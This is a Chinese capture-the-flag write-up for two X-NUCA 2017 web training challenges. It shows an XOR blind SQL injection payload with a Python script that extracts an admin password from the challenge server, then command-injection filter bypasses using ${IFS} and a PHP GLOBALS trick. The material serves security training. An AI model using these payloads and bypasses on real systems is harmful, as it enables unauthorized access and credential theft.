X-NUCA 2017 web专题赛训练题 阳光总在风雨后和default wp
0X0、前言
X-NUCA 2017来了,想起2016 web专题赛,题目都打不开,希望这次主办方能够搞好点吧!还没开赛,依照惯例会有赛前指导,放一些训练题让CTFer们好感受一下题目。
题目有一大部分是去年的题,简单过了一遍,重点放在那几道新题。
有五道新题,自己又不是专业CTFer,菜鸡一枚,做多少记录多少。
目前做出了《阳光总在风雨后》和《default》,《Document》get了shell,但无奈死活找不出flag。
下面是题解,不定期更新题目WP
0X1、阳光总在风雨后
1、sql注入绕过
先看题,没有文件泄露,只有一个登录框,测试了一下是有注入的。
用户名:admin 密码:1 提示密码错误
用户名:admin' 密码:1 提示用户名错误
由上面的测试,我们知道存在用户名admin,没有错误回显,应该是盲注,存在注入的地方是用户名。
弄明白注入类型之后,就可以对症下药了。
但是应该没有那么简单,果然测试了之后发现过滤了不少关键字,下面简要说一下测试过程,可能说的不是很清楚。
正常情况下,用户名没有输错,返回的是密码错误,而admin'返回的是用户名错误,也就是说用户名的sql语句存在错误就会返回用户名错误
在后面加一个空格试一下?
返回提示说非法字符,空格被过滤了。
再试一下其他的字符? 如: or ,and,| 之类的
or 也被过滤了。
到这里我们就知道如果输出的关键字被过滤了,就会返回illegal character!!@_@ 。
我做的时候是手动fuzz的,当然我们可以用burpsuite来fuzz,跑一下就OK了。这里就不多说了
最终fuzz发现^是没有过滤的。那就可以用这个来盲注了。对xor注入不了解这么办?问度娘呗。
百度搜索:"xor 注入",看到这篇文章
最终我们知道xor注入的一些判断。
真^真 = 假
真^假 = 真
假^真 = 真
假^假 = 假
一句话总结就是: 相同为假,相异为真
再看看sql注入绕过之类的wp,百度搜索:"ctf sql注入绕过"
找到了一些文章,而在这篇《CTF比赛中的SQL注入的一些经验总结》里面找到了类似的payload。
善用搜索引擎,就是这么简单。简要说明下payload的意思
^(ascii(mid((passwd)from(1)))>10)^'1'='1
1,ascii 是对某个字符求ascii码,最左边的字符串str返回的数值
2,mid 用于得到一个字符串的一部分
MID() 函数语法为:
SELECT MID(ColumnName, Start [, Length]) from Tablename
注:字符串从1开始,而非0,Length是可选项,如果没有提供,MID()函数将返回余下的字符串。
而这里mid语法貌似有点怪异,为什么会是mid((passwd)from(1))呢?其实意思是一样的。我们做个测试。
可以看到from 1就相当于mid(str,1)。
看一下一整句,ascii(mid(('test')from(1))) ,为什么这里返回的ascii码会是116呢?(116是字母't'的ascii码)
那是因为ascii函数是对目标字符串最左边的字符求ascii码,测试如下:
好了,那么整一句sql语句的意思就解释清楚了。
^(ascii(mid((passwd)from(1)))>=10)^'1'='1 passwd字段的内容首字母的ascii码是否大于等于10
^(ascii(mid((passwd)from(1)))>=100)^'1'='1 passwd字段的内容首字母的ascii码是否大于等于100
^(ascii(mid((passwd)from(2)))>=100)^'1'='1 passwd字段的内容第二个字母的ascii码是否大于等于100
依次类推。。。
^(ascii(mid((passwd)from(1)))>=10)^'1'='1 其中是字母的位置,表示第几个字符 ,是字母的ascii码。
理解清楚了payload的意思,接下来就是写脚本,去跑密码就可以了。
脚本代码:
# -*- coding:utf-8 -*-
# @Date: 2017/08/11 14:12
# @Author: r00tuser
# @Blog: http://cnblogs.com/r00tuser/ import requests
import re def sqli():
url = 'http://218.76.35.74:20130/login.php'
data = {
'uname':'',
'passwd':''
}
flag = ''
for i in range(1,33):
for c in range(1,128):
payload = "admin'^(ascii(mid((passwd)from(%d)))>=%d)^'1'='1" % (i, c)
data['uname'] = payload
response = requests.post(url,data=data).content
if 'username error!!' in response:
flag += chr(c-1) # 因为判断的是大于等于,所以要减去一
print flag
break
if __name__ == '__main__':
sqli()
成功拿到密码
t00ls工具解密得到
ps:当时解出来的时候还是很爽的:)
还有一点没解释,就是代码里为什么判断username error!!的时候为注入出正确的字符的时候呢?这里就不多说了。提示:想想xor语法和认真看一下文章前面。
2、命令执行绕过
在得到了前面的密码之后,我们就可以登录上去了。登录上去之后是一个只有命令执行功能的界面
而这个命令执行也是做了过滤的。
先说说思路:列目录查看一些必要信息,fuzz过滤的关键字,思考有没有办法绕过,目标是查看服务器中的文件内容,因为flag就在里面。
下面说一下便捷快速的解法:
fuzz发现过滤了php关键字与及空格,还有就是cat什么的是没有办法出数据的,ls命令列出的是最后一行的内容
那么想办法绕过,百度找资料,找到这篇文章。http://www.freebuf.com/articles/web/137923.html(浅谈CTF中命令执行与绕过的小技巧)
1,空格绕过,用${IFS}代替空格。
2,寻找更多的信息,ls命令的使用
先列一下当前目录包含了哪些文件:
可以看到有index.php
查看当前目录位置,查看上级目录内容:
执行一下pwd
发现上面还有一个/var/www/html目录
看一下上级目录包含了什么,
命令:ls${IFS}/var/www/html
发现了login.php。但是由于只返回一行,我们看到的内容有限。
这里先补一下ls命令参数的作用
对了,还有一个-r以文件名反序排列。
接下来就是灵活使用命令以不同的方式排序,以获取更多的信息。
执行命令:ls${IFS}-r${IFS}/var/www/html
我们发现了一个类似于md5的'文件'(一开始我以为是文件,其实这里是目录,专业的ctfer一看就知道是目录了)
接下来我们验证一下文件类型。
命令:ls${IFS}-rF${IFS}/var/www/html
可以发现其实是个目录,那么我们接着列一下这个目录看看下面有什么
命令:ls${IFS}-rF${IFS}/var/www/html/9ef89ad913e848b64b73e3aa721e44e4
发现了一个似乎包含flag的php文件。
浏览器直接访问就可以得到flag了。
至此,这道题算是解出来了。其实主要就是ls命令的参数的活用,与及空格的绕过
写题解的时候看似很简单,其实做的时候查了很多资料,绕了很多弯路。一开始的想法就是想着读取文件,用curl结合远程服务器读取了几个文件,发现没有flag。然后想着用ls命令来读取更多的内容,算是误打误撞解出来的。其实题目一开始就有提示,输入框里面提示了ls :)
最后给一下前面登录的源码(绕弯路的是得到的)
<?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(E_ERROR);
define ('PATH_WEB', dirname(__FILE__).'/');
require_once(dirname(__FILE__).'/include/conf.php');
require_once(dirname(__FILE__).'/include/fiter.php');
#var_dump($_SESSION);
if($_SESSION['flag'] === 1){
header("location:./admin/");exit;
}
#echo $_POST['uname'].'````'.$_POST['passwd'];
if($_POST['uname'] && $_POST['passwd']){
$obj = new fiter();
$uname = $obj->sql_clean($_POST['uname']);
$passwd = md5($_POST['passwd']);
$query="SELECT * FROM admin WHERE uname='".$uname."'";
$result=mysql_query($query);
#var_dump($result);
if ($row = mysql_fetch_array($result)){
#print_r($row);echo "\n\r<b";
if ($row['passwd']===$passwd){
$_SESSION['flag'] = 1;
#echo $_SESSION['flag'];
header("location:./admin/");exit();
}
else{
echo "<script>alert('password error!!@_@');parent.location.href='index.php'; </script>"; exit();
}
}
else{
echo "<script> alert('username error!!@_@');parent.location.href='index.php'; </script>"; exit();
}
}
else {
echo "<script> alert('username and password must have a value!!@_@');parent.location.href='index.php'; </script>";exit();
}
?>
0X2、default
这道题其实很简单,描述给了提示,就是要扫文件。
扫出来了一个文件index1.php
提示flag在变量里面,而且这道题在i春秋里面出过。
直接?args=GLOBALS就出来了。
至于为什么是这样子,请查看php手册
0X3 总结
至此,算是解释清楚了两道题,好久没有写过这么详细的题解了。剩下的几道题加油做了,做出来的话会第一时间发上来。
0x04 参考资料
0,http://www.cnblogs.com/REscan/p/7043705.html CTF比赛中SQL注入的一些经验总结
X-NUCA 2017 web专题赛训练题 阳光总在风雨后和default wp的更多相关文章
- 2017河工大校赛补题CGH and 赛后小结
网页设计课上实在无聊,便开始补题,发现比赛时候僵着的东西突然相通了不少 首先,"追妹"这题,两个队友讨论半天,分好多种情况最后放弃(可是我连题目都没看啊),今天看了之后试试是不是直 ...
- 2017乌鲁木齐网络赛 j 题
题目连接 : https://nanti.jisuanke.com/t/A1256 Life is a journey, and the road we travel has twists and t ...
- 2017乌鲁木齐区域赛D题Fence Building-平面图的欧拉公式
这个题B站上面有这题很完整的分析和证明,你实在不懂,可以看看这个视频 https://www.bilibili.com/video/av19849697?share_medium=android&a ...
- hdu6229 Wandering Robots 2017沈阳区域赛M题 思维加map
题目传送门 题目大意: 给出一张n*n的图,机器人在一秒钟内任一格子上都可以有五种操作,上下左右或者停顿,(不能出边界,不能碰到障碍物).题目给出k个障碍物,但保证没有障碍物的地方是强联通的,问经过无 ...
- PTA天梯赛训练题L1-064:估值一亿的AI核心代码(字符串模拟)
Update:smz说regex秒过Orz,yzd记在这里了. 听说今年天梯赛有个烦人的模拟,我便被队友逼着试做一下……一发15,二发20.记一记,要不然枉费我写这么久…… 自己还是代码能力太菜了,校 ...
- 2017乌鲁木齐网络赛 J题 Our Journey of Dalian Ends ( 最小费用最大流 )
题目链接 题意 : 给出一副图,大连是起点,终点是西安,要求你求出从起点到终点且经过中转点上海的最小花费是多少? 分析 : 最短路是最小费用最大流的一个特例,所以有些包含中转限制或者经过点次数有限制的 ...
- Infinite Fraction Path HDU 6223 2017沈阳区域赛G题题解
题意:给你一个字符串s,找到满足条件(s[i]的下一个字符是s[(i*i+1)%n])的最大字典序的长度为n的串. 思路:类似后缀数组,每次倍增来对以i开头的字符串排序,复杂度O(nlogn).代码很 ...
- HDU 6205 2017沈阳网络赛 思维题
题目链接:http://acm.hdu.edu.cn/showproblem.php?pid=6205 题意:给你n堆牌,原本每一堆的所有牌(a[i]张)默认向下,每次从第一堆开始,将固定个数的牌(b ...
- 2017北大校赛 J题 pairs
题目链接 http://poj.openjudge.cn/practice/C17J/ orz 原来是一道无脑枚举题目 只是很卡常数而已 复杂度算错也是很醉orz 当时怎么没想着优化常数呢 题解:枚举 ...
随机推荐
- Hugo快速搭建Blog
以往我们搭建blog要么学习一个编程语言+Web开发框架,要么使用现成的blog系统(如WordPress).其实我们还可以使用Hugo.Hugo是由Go语言实现的静态网站生成器,它不需要数据库,所以 ...
- 浅谈关于特征选择算法与Relief的实现
一. 背景 1) 问题 在机器学习的实际应用中,特征数量可能较多,其中可能存在不相关的特征,特征之间也可能存在相关性,容易导致如下的后果: 1. 特征个数越多,分析特征.训练模型所需的时间就越 ...
- Java IO学习笔记(三)转换流、数据流、字节数组流
转换流 1.转换流:将字节流转换成字符流,转换之后就可以一个字符一个字符的往程序写内容了,并且可以调用字符节点流的write(String s)方法,还可以在外面套用BufferedReader()和 ...
- MySQL慢查询日志
实验环境: OS X EI Captian + MySQL 5.7 一.配置MySQL自动记录慢查询日志 查看变量,也就是配置信息 show (global) variables like '%slo ...
- javascript 玩转Date对象
前言:最近在做一个日期选择功能,在日期转换的时候经常换到晕,总结一下常用的Date对象的相关用法,方便日后直接查看使用- 1. new Date()的使用方法有: 不接收任何参数:返回当前时间: 接收 ...
- Java自学手记——Java中的关键字
Java中的一些关键字对于初学者来说有时候会比较混乱,在这里整理一下,顺便梳理一下目前掌握的关键字. 权限修饰符 有四个,权限从大到小是public>protected>defaul(无修 ...
- Codeforces Round #423 B. Black Square
题目网址:http://codeforces.com/contest/828/problem/B 题目: Polycarp has a checkered sheet of paper of size ...
- 使用travis-ci自动部署github上的项目
travis-ci是什么? 一个使用yaml格式配置用于持续集成完成自动化测试部署的开源项目 官网:https://travis-ci.org/ 使用travis-ci集成vue.js项目 首先,您需 ...
- input复选框操作的部分高频率使用代码
1. 获取单个checkbox选中项(三种写法): $("input:checkbox:checked").val() 或者 $("input:[type='checkb ...
- ARKit 初体验
ARKIT是苹果公司在今年发布的一个AR开发包,用于现有的IOS设备,是的,就是用在手机或者平板上,类似于pokemon go的效果.看了下演示视屏,嗯,看起来很厉害. 对于一个资深软粉,居然被要求研 ...